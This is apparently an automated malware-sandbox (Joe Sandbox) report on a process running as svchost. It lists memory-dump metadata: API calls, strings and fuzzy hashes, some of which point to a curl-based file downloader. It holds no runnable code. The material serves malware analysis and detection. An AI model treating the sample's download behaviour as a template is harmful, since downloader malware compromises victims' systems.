            • Instruction Fuzzy Hash: B9014B10F08BC3A1FA189B10AC911B527A0BF57724F849035D54EA32A6EF6CA7499770

            Control-flow Graph

            APIs
            • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFA41886B11,?,00007FFA41851C75,?), ref: 00007FFA418793A2
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ConsoleMode
            • String ID:
            • API String ID: 4145635619-0
            • Opcode ID: 0191dd56cb59d05cb8921a4798d09492ac6c02315033d51c4726e76e93e8fde7
            • Instruction ID: cb268e878fbd0a1bf649f45194e1b1c5ff65d1c1e709db29086fd0761791ec96
            • Opcode Fuzzy Hash: 0191dd56cb59d05cb8921a4798d09492ac6c02315033d51c4726e76e93e8fde7
            • Instruction Fuzzy Hash: 8A91D532E1C65285FB53EB6598803BD2BE0BB46BA8F449136DE1E636A5DF38F445C300
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: x{}
            • API String ID: 0-1205620038
            • Opcode ID: 57a5ebe335d81e930eaf620cfff9ecf289f9037de4ff7bf7f93a382b119c3dc1
            • Instruction ID: 56b20333414e4413eb22751a831ca8fc4e28ec84c724983ecebd9e776972c9bc
            • Opcode Fuzzy Hash: 57a5ebe335d81e930eaf620cfff9ecf289f9037de4ff7bf7f93a382b119c3dc1
            • Instruction Fuzzy Hash: 9A51EB32B0D741C5EB27AB15F4413B9A261EB8A394F548235EA9D477E7EF7CE1428700
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: e1134cc1dad0db26aa2db931487d3556eaa9b00c28f43be0c2844432063eeed9
            • Instruction ID: bba970deb28ee83b6a2cbb63b76912d00b3bd27c4e70c75fc463b3c02aef43f8
            • Opcode Fuzzy Hash: e1134cc1dad0db26aa2db931487d3556eaa9b00c28f43be0c2844432063eeed9
            • Instruction Fuzzy Hash: FB51D221F0D5828AFB6BAF6A950077A6691AF87BA4F94D234DD2D577E5CE3CF4004600
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d932aa7ae23578de4649594ddc4564af2b2b562f32a4ffcaab1a3f7d025f2311
            • Instruction ID: a68d7c44ae8cc5306669ac41ea6364588e8fa3b1568998d568f4d792ae9da899
            • Opcode Fuzzy Hash: d932aa7ae23578de4649594ddc4564af2b2b562f32a4ffcaab1a3f7d025f2311
            • Instruction Fuzzy Hash: A141B336B09B5985EB53AF2AD44037C63A1FB45FD8F548432DE0D17BA9DE38D8468704
            APIs
            • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFA41862A56,?,?,?,00007FFA41866C2E), ref: 00007FFA4187108E
            • _invalid_parameter_noinfo.LIBCMT ref: 00007FFA418710F1
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
            • String ID:
            • API String ID: 1808705829-0
            • Opcode ID: 787efea584088b6d6b9ca6d6dcf9c9c55a389264e7c1f3a561f889cd0549ea99
            • Instruction ID: cf894c42bb6c34521393d162ae169a18161f6fc24bec0ec446ee50f1e79cea83
            • Opcode Fuzzy Hash: 787efea584088b6d6b9ca6d6dcf9c9c55a389264e7c1f3a561f889cd0549ea99
            • Instruction Fuzzy Hash: 20319021F1C68281FB63BB51A80137962E1AF87B84F54C035DA5D47AB6CF3CF8008711
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ChangeCloseErrorFindLastNotification
            • String ID:
            • API String ID: 1687624791-0
            • Opcode ID: 3e2a093233af3cc0de44823494553dbac82f4697178b8f79bf05f0434f475961
            • Instruction ID: 8f487b5c75a11104c13f5b1d12c6190a95a3c9883623e2dac46fd913e24a7096
            • Opcode Fuzzy Hash: 3e2a093233af3cc0de44823494553dbac82f4697178b8f79bf05f0434f475961
            • Instruction Fuzzy Hash: DF218E61F1C68281EB577721A98037912C19F867B4F08C235EA3E877E2DE7CF4408301
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorFileLastPointer
            • String ID:
            • API String ID: 2976181284-0
            • Opcode ID: 5f3265697be2019f68afacfcc20b245da58e981e5470f7d53b5fd53093734ee7
            • Instruction ID: 6fb17013a1f8baaefa03c43e614f23f92ae6124ea7c323c076fdd0e3a5ae242e
            • Opcode Fuzzy Hash: 5f3265697be2019f68afacfcc20b245da58e981e5470f7d53b5fd53093734ee7
            • Instruction Fuzzy Hash: C811046671CB8181DB12AB25E80426963A1FB46BF4F588731EE7D477E9DF7CE0408740
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task
            • String ID:
            • API String ID: 118556049-0
            • Opcode ID: bb86bc8f5b42b066b5a2a18e08009b1d73abb50dc37e3bee3864d8c61a03a92c
            • Instruction ID: 3e5966c62141cf45b2b2aa7a6f07cbc8f84a8163c5e0d65f9278d54d3b1f0086
            • Opcode Fuzzy Hash: bb86bc8f5b42b066b5a2a18e08009b1d73abb50dc37e3bee3864d8c61a03a92c
            • Instruction Fuzzy Hash: B1F04911F1E10780FF6BBB72585117502A0AF5B7ACF988630C97E862F2EF1CF4929610
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: a90ba9f02f9fd4960b28bf92607e1af1b77d2959c4ed5fc28795b5da87eefb9a
            • Instruction ID: 953e757904af675be5c414d106b2a122d544edc66dab1c77ae50e85992855349
            • Opcode Fuzzy Hash: a90ba9f02f9fd4960b28bf92607e1af1b77d2959c4ed5fc28795b5da87eefb9a
            • Instruction Fuzzy Hash: FE71CF32E0C2424AFB67BB65998527A66D2FFC3384F14C435DA2E167B5DE3CF8418604
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 2e84ece921895406fdef6938223af951c0da4b3c25055168f37ffc70fcd32a18
            • Instruction ID: d8b7b28d80527d6af7007df4c29a2dc469d5c35e6b7ee327ae88140493ba1f07
            • Opcode Fuzzy Hash: 2e84ece921895406fdef6938223af951c0da4b3c25055168f37ffc70fcd32a18
            • Instruction Fuzzy Hash: 8041CC32A0D20187EB27EB28A95027977E4EB57B60F548531DAAE836A1CF2CF402C751
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 5cecc257144e4e27949d86f4c99194fbcb84acce64af393fa4c425b844cf5a23
            • Instruction ID: f6af59c12f31ba420189972c215c0fb6f889a34e69b04f8672ef0c9cb4d474ad
            • Opcode Fuzzy Hash: 5cecc257144e4e27949d86f4c99194fbcb84acce64af393fa4c425b844cf5a23
            • Instruction Fuzzy Hash: 3F31AC26E1C65285F757BF15984137C26A0AF42B94F958239EA2D533F2CFBCF8828711
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 5b86d15f88d074e77b11a30457639f6e007144b2872ab35b64636c2b2c5ca410
            • Instruction ID: 32093746dbb1fc019d788fd1b8a92fbbfee7e7ad4a7e857f911c041a44111888
            • Opcode Fuzzy Hash: 5b86d15f88d074e77b11a30457639f6e007144b2872ab35b64636c2b2c5ca410
            • Instruction Fuzzy Hash: 90218433A0CA8187D763AF58E44077977A1EB86B94F648234EA5D876E9DF3CE400CB00
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 5cb7b1feb9b43db1098235879318ebf0376573b7b6df1c2cd61902e527f68d3e
            • Instruction ID: d1406834a679d5427ed0b792c387b538452525657a3eef9e9cf86c7560d7760e
            • Opcode Fuzzy Hash: 5cb7b1feb9b43db1098235879318ebf0376573b7b6df1c2cd61902e527f68d3e
            • Instruction Fuzzy Hash: 4D018E21A0C79545EB07AB62A940169A691AF87FE0F988634EE6C13BE6CE3CF5014300
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 4d0cebdd5390d01fd6a81d2093c95c750d9d331ee448a874a7ec04b3be5c555d
            • Instruction ID: c9730722b3c0550956b788a04203080acc85a187aaed94d60fb10e1fa0c2ee25
            • Opcode Fuzzy Hash: 4d0cebdd5390d01fd6a81d2093c95c750d9d331ee448a874a7ec04b3be5c555d
            • Instruction Fuzzy Hash: FB017C62B0EA4699EF07EB50E6452BCA2A0AF06B84FD4C035C61C063A5EE2CF8948310
            APIs
            • RtlAllocateHeap.NTDLL(?,?,?,00007FFA4187B0BD,?,?,00000000,00007FFA4187BADF,?,?,?,00007FFA4187226B,?,?,?,00007FFA41872161), ref: 00007FFA4187290E
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 0c937c045c7e1eb94fbeedb88f0348d564f3251b54991164d1961001a4aaec9b
            • Instruction ID: ce43001941372143a8943f1f20e973fcf75697e2f3d0bad688daf36399577351
            • Opcode Fuzzy Hash: 0c937c045c7e1eb94fbeedb88f0348d564f3251b54991164d1961001a4aaec9b
            • Instruction Fuzzy Hash: 0EF03410E0D20641FB27B7A26C51BB453C24F877E0F4C8234E93E862F2EE2CB4808220
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: 4ff3df62cc57fa8db39030fbf527b6171d4d0221553f6a3751272f53060b5813
            • Instruction ID: 39cd9ad4675c134f88151db35f339054de6c56a4a983021ed867a5882bce00e4
            • Opcode Fuzzy Hash: 4ff3df62cc57fa8db39030fbf527b6171d4d0221553f6a3751272f53060b5813
            • Instruction Fuzzy Hash: 98E02231A1DA8685FB273BB4A18057C61609F237F4FA4C330EA3C032E5DE38B8508220
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID:
            • API String ID: 3215553584-0
            • Opcode ID: cae8df84b8d7a562aee2e6675108a7fbbdd700c0eca3694e76a62b9b5b9b91ca
            • Instruction ID: d7d8a38619cd8c9010937b4cfdff08415c8392ad832b6aa325037ca2a4c9fba9
            • Opcode Fuzzy Hash: cae8df84b8d7a562aee2e6675108a7fbbdd700c0eca3694e76a62b9b5b9b91ca
            • Instruction Fuzzy Hash: 48E0ED61E0E1428AFB177BA09C41BBD12D05F43700FE0C134D95D962E2CE3D78026762
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: curl_global_init
            • String ID:
            • API String ID: 3035275971-0
            • Opcode ID: c43d3f8e08e96f86841b2bc61319f4f09dc47221fa76fdc1bbfa25a8b61713f7
            • Instruction ID: 88ca34b5ff22e3cb0abf0b8bd064a8071cf23e494ba577be3c16ec48f4e02523
            • Opcode Fuzzy Hash: c43d3f8e08e96f86841b2bc61319f4f09dc47221fa76fdc1bbfa25a8b61713f7
            • Instruction Fuzzy Hash: 66C01289E0C28299FB07332098053202BE2AB26318F848278C10E012B2AF5C22898701
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: curl_easy_setopt$curl_easy_cleanupcurl_easy_initcurl_easy_performcurl_easy_strerror
            • String ID: Content type is not downloadable or response code is not OK$Failed to Initialize cURL$File could not be created.$application/octet-stream$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$text/plain; charset=utf-8
            • API String ID: 2825223466-4018419100
            • Opcode ID: d85913f9b69b27529117e5d785c89d233f765071da7242c062c0a4f409c0731e
            • Instruction ID: 62d1dca99593365c97206ebab7839160746d68e2a0bee88c951a0a3988e2ee2e
            • Opcode Fuzzy Hash: d85913f9b69b27529117e5d785c89d233f765071da7242c062c0a4f409c0731e
            • Instruction Fuzzy Hash: 0DE14D22A1CB8185EB13EB35D5806BD37B0FB86B88F558235DE0E57A66EF38E145C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocale$free$_strdupstrchr$strcmp
            • String ID: LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX
            • API String ID: 1324643423-2921774448
            • Opcode ID: e6c7ad1d9f60df151eb7dc10e28354505227c09a40da8267f4cf20ae9a8186ff
